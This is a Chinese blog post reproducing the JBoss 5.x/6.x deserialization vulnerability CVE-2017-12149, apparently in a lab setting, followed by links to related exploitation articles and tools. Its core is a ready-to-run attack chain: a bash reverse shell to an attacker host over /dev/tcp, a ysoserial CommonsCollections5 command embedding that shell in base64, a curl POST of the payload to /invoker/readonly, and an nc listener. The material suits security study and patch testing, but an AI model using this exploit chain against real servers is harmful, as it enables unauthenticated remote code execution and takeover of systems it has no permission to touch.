jboss反序列化漏洞

最新推荐文章于 2024-06-24 15:00:00 发布
最新推荐文章于 2024-06-24 15:00:00 发布
阅读量1.2k 收藏 4
点赞数
分类专栏: 中间件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48776804/article/details/116919336
版权

jboss反序列化漏洞


CVE-2017-12149

1 漏洞原因

官话:
该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列,jboss中 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化

简话:
(1) jboss 5.x或者6.x这个版本存在反序列化漏洞,至于什么叫反序列化漏洞,序列化是java对象转换成字节序列,是一个化零为整的过程,反序列化是重新把字节序列变成java对象。我们利用这个转换过程中加入一点东西。
(2) 在jboss这个中间件中,由jboss的ReadOnly AccessFilter 过滤器具体执行这个反序列化动作,他没有任何检查。
(3) 我们可以利用post请求,给 /invoker/readonly 发送请求,post内容中包含我们的bash反弹的序列化数据,具体由ysoserial生成一个poc.ser

2 漏洞复现

(1)使用在线工具转换下这条命令,其中的ip地址是kali,这里我们使用nc反弹shell
不过这里需要变成java语言,在线工具
http://www.jackson-t.ca/runtime-exec-payloads.html
bash -i >&/dev/tcp/192.168.43.208/9999 0>&1

在这里插入图片描述

(2)java的ysoserial 生成序列化数据
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210511184554441.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80ODc3NjgwNA ==,size_16,color_FFFFFF,t_70)

java -jar ysoserial-master-d367e379d9-1.jar  CommonsCollections5 "bash -c {echo,YmFzaCAtaSAgPiYgIC9kZXYvdGNwLzE5Mi4xNjguNDMuMjA4Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" > shell.ser

(3) curl发给 /invoker/readonly接口

curl http://192.168.43.127:8080/invoker/readonly --data-binary @shell.ser
上面那个/invoke,少输了一个r,是错误示范,第二个才是正确的
在这里插入图片描述
(4)kali开启监听,并接受shell
nc -lvnp 9999
在这里插入图片描述

wx_7782175678
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JBoss漏洞:JBOSS反序列化漏洞合集
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-09 384
JBOSS反序列化漏洞合集,由于反序列化漏洞的攻击方式都是一样的,只是漏洞发生的文件和成因不同,所以就以JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)为例子过一遍流程 JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149) 该漏洞存在于http invoker组件的ReadOnlyAccessFilter的doFilter中,在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化
Jboss反序列化漏洞
arissa666的博客
10-14 236
执行命令,因为存在jboss存在漏洞,所以执行命令得到结果。找一下jboss的目录 dir /s c:\*.jsp。在自己上传的文件上执行命令得到自己想要的信息。看下server.xml 端口设置的多少。给这个目录上传一个脚本csits.jsp。结构是IP:端口/文件夹/脚本文件名。先选一个jboss目录上传试一下。用jboss反序列工具进行扫描。run.bat运行jboss。上传后在当前目录就可以看到。登录密码whoami。
JBOSS反序列化漏洞
weixin_52206305的博客
07-05 3900
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。 经典的JBoss反序列化漏洞JBoss在请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。访问http://ip+端口/invoker/JMXInvokerServlet 如果出现下载提示框,就证明可能存在漏洞。该漏洞出现在请求中访问http://ip+端口/如果出现该页面就表示可能存在漏洞漏洞出现在/invoker/rea
中间件安全:JBoss 反序列化命令执行漏洞.(CVE-2017-7504)
最新发布
Karka_的博客
06-24 784
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
JBoss 反序列化漏洞复现
小小猪的博客
11-22 326
JBoss 反序列化漏洞复现 漏洞描述: 互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。 影响范围: 漏洞影响5.x和6.x版本的JBOSSAS。 漏洞分析: Java序列化与反序列化作用:便于保存数据,或者进行数据传输。 Java序列化文件文件头对于序列化的标识:AC ED 00 05。 序列化 FileOutputStre
vulhub漏洞复现-jboss反序列化漏洞复现
weixin_45095113的博客
12-21 651
vulhub漏洞复现-jboss反序列化漏洞
Jboss反序列化漏洞的复现与原理
LJH1999ZN的博客
03-29 4924
一、什么是Jboss Jboss是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。 Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器,所以曾经广为流行。 二、Jboss的历史漏洞 1.jboss反序列化漏洞,CVE-2017-7504 漏洞存在/jbossmq-httpi
Jboss反序列化漏洞复现
weixin_53747497的博客
02-24 532
JBoss 在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象,然后我们 可以利用 Apache Commons Collections 中的 Gadget 执行任意代码。Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中 没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,请求中读取了用户传入的对象,从而导致了漏洞
一次老版本jboss反序列化漏洞的利用分析
C20220511的博客
09-28 1220
所以我们直接利用ysoserial的Hibernate1利用链是不能成功的,但是仔细对Hibernate1利用链进行分析可以看出漏洞利用过程中的调用栈中并没有涉及到上述不存在的类,上述不存在的类主要用于设置一些类的属性字段,可以通过其他类来代替。这里可以看出jboss中引入的是CommonsCollections2.1的版本,而一般我们平时能利用的版本都是3.x。调试反序列化利用链的代码是一个很麻烦的事情,有兴趣的小伙伴可以把我上面的代码去跟一下,其中主要用到的调用过程如下。
漏洞复现】Jboss反序列化漏洞(CVE-2017-12149)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-17 829
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用CVE-2017-12149漏洞:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter ,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。............
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
Java反序列化漏洞利用工具.zip
04-10
标题"Java反序列化漏洞利用工具.zip"表明该压缩包内包含了针对Java反序列化漏洞的利用工具,特别提到了针对JBOSS和WebLogic两个流行的Java应用服务器。JBOSS和WebLogic都是企业级的应用服务器,广泛用于部署各种业务...
JBOSS反序列化漏洞工具
03-28
通过JBOSS4 commons-collections.jar包的反序列化类InvokerTransformer, InstantiateFactory 和 InstantiateTransfromer class 文件可以远程操控服务器
java反序列化漏洞利用工具Jboss&WebLogic;.rar
07-23
jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出...
JBossMQJMS 反序列化漏洞(CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞(CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
shiro反序列化
热门推荐
weixin_48776804的博客
05-12 1万+
shiro反序列化
weblogic-T3反序列化
weixin_48776804的博客
05-11 1011
weblogic-T3反序列化
weblogic寻找路径
weixin_48776804的博客
06-25 901
weblogic寻找路径
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值